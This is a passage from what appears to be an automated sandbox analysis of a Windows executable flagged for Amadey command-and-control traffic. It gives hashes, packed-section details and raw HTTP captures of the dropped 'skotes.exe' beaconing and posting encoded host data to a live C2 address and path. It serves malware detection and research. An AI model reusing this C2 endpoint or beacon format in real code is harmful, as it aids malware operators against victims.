                                                Entropy (8bit):3.4396029193056945
                                                Encrypted:false
                                                SSDEEP:6:qgdbXUhXUEZ+lX1CGdKUe6tE9+AQy0lBz1ut0:D4Q1CGAFD9+nVBAt0
                                                MD5:7C2BF1C453495148EC9D586399D2C7B7
                                                SHA1:EDC88EFB8C0756B6087693A5DE6A6EF039F5F5D8
                                                SHA-256:D0A7D66022488CD694DF71B3689B0BD69F2D454897E217C6A3A5D4CC85B0A325
                                                SHA-512:31750B595E795B90759CEA39E5B72C65FE30EEA73CB0D5CE8B85F86F4349EFAFADE78AF7E21DBA390884BC140C38187BED061518FCD47C2C1923E0A09759164E
                                                Malicious:false
                                                Reputation:low
                                                Preview:.......6...O.p.P]..BF.......<... .....s.......... ....................;.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........E.N.G.I.N.E.E.R.-.P.C.\.e.n.g.i.n.e.e.r...................0...................@3P.........................

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Entropy (8bit):7.9510844124633255
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:file.exe
                                                File size:1'884'672 bytes
                                                MD5:6d76634e0d5a3748dbb40ed91d91480a
                                                SHA1:70fa798c82153db02e218b3a7efa2f56f051cced
                                                SHA256:d99688821d8644f9e44764be9944c327abc3162866e51ad78a02dcdc25a08730
                                                SHA512:137b80797c2158247adb3a7a865b5d0a44cf096b0a6c9377f2e548b5475d811273f0a367aa11db74538474df64fe58384f04ce013d9d5395904e68a8edf9af9a
                                                SSDEEP:49152:rD4pAVIEUn78EYltySaV85C1E/K4fvnMPgn/E:r8+VOn4EY6gfK4cP/
                                                TLSH:BE95332ED71C7F24C4C408734BA367C2F668ED1745D8C7FE658806EABC6624ACBA15B4
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C................

                                                File Icon

                                                Icon Hash:00928e8e8686b000

                                                Static PE Info

                                                General

                                                Entrypoint:0x8b1000
                                                Entrypoint Section:.taggant
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x66F0569C [Sun Sep 22 17:40:44 2024 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:6
                                                OS Version Minor:0
                                                File Version Major:6
                                                File Version Minor:0
                                                Subsystem Version Major:6
                                                Subsystem Version Minor:0
                                                Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                Entrypoint Preview

                                                Instruction
                                                jmp 00007FD288E1027Ah
                                                push fs
                                                sbb al, 00h
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                jmp 00007FD288E12275h
                                                add byte ptr [eax+eax], bl
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add cl, byte ptr [edx]
                                                add byte ptr [eax], al
                                                push es
                                                or al, byte ptr [eax]
                                                add byte ptr [edx+ecx], al
                                                add byte ptr [eax], al
                                                add ecx, dword ptr [edx]
                                                add byte ptr [eax], al
                                                add dword ptr [edx], ecx
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add dword ptr [eax+00000000h], eax
                                                add byte ptr [eax], al
                                                adc byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add dword ptr [edx], ecx
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                and byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add dword ptr [edx], ecx
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0570x6b.idata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x344.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x4af49c0x10iaxkupqh
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x4af44c0x18iaxkupqh
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                0x10000x680000x2de00ac47e1b1a871500367af13e27838d724False0.9983289339237057data7.989396011362113IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .rsrc0x690000x3440x400982623c07c43a8169da5c3bd55ce4d06False0.4345703125data5.395849414192414IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .idata 0x6a0000x10000x200cc76e3822efdc911f469a3e3cc9ce9feFalse0.1484375data1.0428145631430756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                0x6b0000x2aa0000x200d317ae2e3ebecca69c3c098d7b674377unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                iaxkupqh0x3150000x19b0000x19a6004f37c619245b05941a0608408ebdb47bFalse0.9948247839247639data7.954913292155413IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                fnhucfqp0x4b00000x10000x400939382e64d58f151975997b8efda0f62False0.8017578125data6.222567992963912IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .taggant0x4b10000x30000x22000597c029dc45930e2075ec18b1569e91False0.07674632352941177DOS executable (COM)0.8090136675948747IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                Resources

                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                RT_MANIFEST0x690700x152ASCII text, with CRLF line terminators0.6479289940828402
                                                RT_MANIFEST0x691c40x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                                Imports

                                                DLLImport
                                                kernel32.dlllstrcpy

                                                Possible Origin

                                                Language of compilation systemCountry where language is spokenMap
                                                EnglishUnited States

                                                Network Behavior

                                                Suricata IDS Alerts

                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                2024-11-24T02:23:07.289907+01002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.649852185.215.113.4380TCP

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Nov 24, 2024 02:23:05.790829897 CET4985280192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:05.910586119 CET8049852185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:05.911155939 CET4985280192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:05.911398888 CET4985280192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:06.030788898 CET8049852185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:07.289686918 CET8049852185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:07.289906979 CET4985280192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:08.797889948 CET4985280192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:08.798258066 CET4986180192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:08.917701006 CET8049861185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:08.917715073 CET8049852185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:08.917905092 CET4985280192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:08.917922020 CET4986180192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:08.918174982 CET4986180192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:09.037600040 CET8049861185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:10.278426886 CET8049861185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:10.278500080 CET4986180192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:11.907174110 CET4986180192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:11.907628059 CET4986980192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:12.026959896 CET8049861185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:12.027034044 CET4986180192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:12.027091980 CET8049869185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:12.027192116 CET4986980192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:12.027440071 CET4986980192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:12.146830082 CET8049869185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:13.404376984 CET8049869185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:13.404489994 CET4986980192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:14.907243967 CET4986980192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:14.907609940 CET4987580192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:15.026998043 CET8049869185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:15.027048111 CET8049875185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:15.027074099 CET4986980192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:15.027120113 CET4987580192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:15.027318954 CET4987580192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:15.146753073 CET8049875185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:16.419018984 CET8049875185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:16.419154882 CET4987580192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:18.050060034 CET4987580192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:18.050399065 CET4988680192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:18.170028925 CET8049886185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:18.170042992 CET8049875185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:18.170248985 CET4987580192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:18.170254946 CET4988680192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:18.170521975 CET4988680192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:18.290054083 CET8049886185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:19.548300028 CET8049886185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:19.552217007 CET4988680192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:21.063821077 CET4988680192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:21.064207077 CET4989280192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:21.183532000 CET8049886185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:21.183641911 CET4988680192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:21.183655977 CET8049892185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:21.183738947 CET4989280192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:21.183948994 CET4989280192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:21.303340912 CET8049892185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:22.519133091 CET8049892185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:22.519207001 CET4989280192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:24.141606092 CET4989280192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:24.141865969 CET4990080192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:24.261298895 CET8049900185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:24.261316061 CET8049892185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:24.261429071 CET4989280192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:24.261435986 CET4990080192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:24.261709929 CET4990080192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:24.381078005 CET8049900185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:25.604116917 CET8049900185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:25.604293108 CET4990080192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:27.110852957 CET4990080192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:27.111263037 CET4991080192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:27.230796099 CET8049900185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:27.230890036 CET4990080192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:27.230901957 CET8049910185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:27.230982065 CET4991080192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:27.240940094 CET4991080192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:27.360395908 CET8049910185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:28.664896965 CET8049910185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:28.668133020 CET4991080192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:30.300632000 CET4991080192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:30.301898003 CET4991680192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:30.420723915 CET8049910185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:30.420845985 CET4991080192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:30.421456099 CET8049916185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:30.421547890 CET4991680192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:30.421768904 CET4991680192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:30.541213036 CET8049916185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:31.798350096 CET8049916185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:31.798424006 CET4991680192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:33.313546896 CET4991680192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:33.313905954 CET4992380192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:33.433547020 CET8049923185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:33.433649063 CET4992380192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:33.433779955 CET8049916185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:33.433835983 CET4991680192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:33.433871031 CET4992380192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:33.553374052 CET8049923185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:34.773086071 CET8049923185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:34.773163080 CET4992380192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:36.391622066 CET4992380192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:36.391997099 CET4993380192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:36.511497021 CET8049923185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:36.511571884 CET8049933185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:36.511599064 CET4992380192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:36.511646986 CET4993380192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:36.511797905 CET4993380192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:36.631269932 CET8049933185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:37.900830030 CET8049933185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:37.900966883 CET4993380192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:39.407180071 CET4993380192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:39.407635927 CET4993980192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:39.527213097 CET8049933185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:39.527255058 CET8049939185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:39.527291059 CET4993380192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:39.527405024 CET4993980192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:39.528475046 CET4993980192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:39.648003101 CET8049939185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:40.908083916 CET8049939185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:40.908196926 CET4993980192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:42.534626007 CET4993980192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:42.534941912 CET4994780192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:42.654375076 CET8049939185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:42.654401064 CET8049947185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:42.654464006 CET4993980192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:42.654479027 CET4994780192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:42.654645920 CET4994780192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:42.774024010 CET8049947185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:44.030520916 CET8049947185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:44.030580044 CET4994780192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:45.532176018 CET4994780192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:45.532553911 CET4995680192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:45.651959896 CET8049947185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:45.652040958 CET8049956185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:45.652066946 CET4994780192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:45.652144909 CET4995680192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:45.652378082 CET4995680192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:45.771945953 CET8049956185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:46.997339964 CET8049956185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:47.000190020 CET4995680192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:48.625961065 CET4995680192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:48.626307011 CET4996280192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:48.745793104 CET8049956185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:48.745805979 CET8049962185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:48.745862007 CET4995680192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:48.745913982 CET4996280192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:48.746124029 CET4996280192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:48.865534067 CET8049962185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:50.132993937 CET8049962185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:50.133121014 CET4996280192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:51.643630981 CET4996280192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:51.643913984 CET4997280192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:51.763387918 CET8049972185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:51.763473034 CET8049962185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:51.763475895 CET4997280192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:51.763555050 CET4996280192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:51.763736963 CET4997280192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:51.883196115 CET8049972185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:53.163110971 CET8049972185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:53.163187981 CET4997280192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:54.782273054 CET4997280192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:54.782682896 CET4998080192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:54.902151108 CET8049972185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:54.902165890 CET8049980185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:54.902218103 CET4997280192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:54.902283907 CET4998080192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:54.902472019 CET4998080192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:55.021827936 CET8049980185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:56.278815985 CET8049980185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:56.278917074 CET4998080192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:57.829103947 CET4998080192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:57.829386950 CET4998680192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:57.948894978 CET8049986185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:57.948934078 CET8049980185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:57.949018002 CET4998080192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:57.949043036 CET4998680192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:57.949256897 CET4998680192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:23:58.068680048 CET8049986185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:59.331363916 CET8049986185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:23:59.332221985 CET4998680192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:24:00.971786976 CET4998680192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:24:00.972152948 CET4999680192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:24:01.091670036 CET8049996185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:24:01.091758013 CET4999680192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:24:01.091866016 CET8049986185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:24:01.092000961 CET4999680192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:24:01.092040062 CET4998680192.168.2.6185.215.113.43
                                                Nov 24, 2024 02:24:01.211548090 CET8049996185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:24:02.479404926 CET8049996185.215.113.43192.168.2.6
                                                Nov 24, 2024 02:24:02.480348110 CET4999680192.168.2.6185.215.113.43

                                                HTTP Request Dependency Graph

                                                • 185.215.113.43

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.649852185.215.113.43805588C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 24, 2024 02:23:05.911398888 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 185.215.113.43
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Nov 24, 2024 02:23:07.289686918 CET219INHTTP/1.1 200 OK
                                                Server: nginx/1.18.0 (Ubuntu)
                                                Date: Sun, 24 Nov 2024 01:23:07 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.649861185.215.113.43805588C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 24, 2024 02:23:08.918174982 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 185.215.113.43
                                                Content-Length: 160
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 35 32 44 37 32 42 35 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB52D72B55182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                Nov 24, 2024 02:23:10.278426886 CET196INHTTP/1.1 200 OK
                                                Server: nginx/1.18.0 (Ubuntu)
                                                Date: Sun, 24 Nov 2024 01:23:10 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                2192.168.2.649869185.215.113.43805588C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 24, 2024 02:23:12.027440071 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 185.215.113.43
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Nov 24, 2024 02:23:13.404376984 CET219INHTTP/1.1 200 OK
                                                Server: nginx/1.18.0 (Ubuntu)
                                                Date: Sun, 24 Nov 2024 01:23:13 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
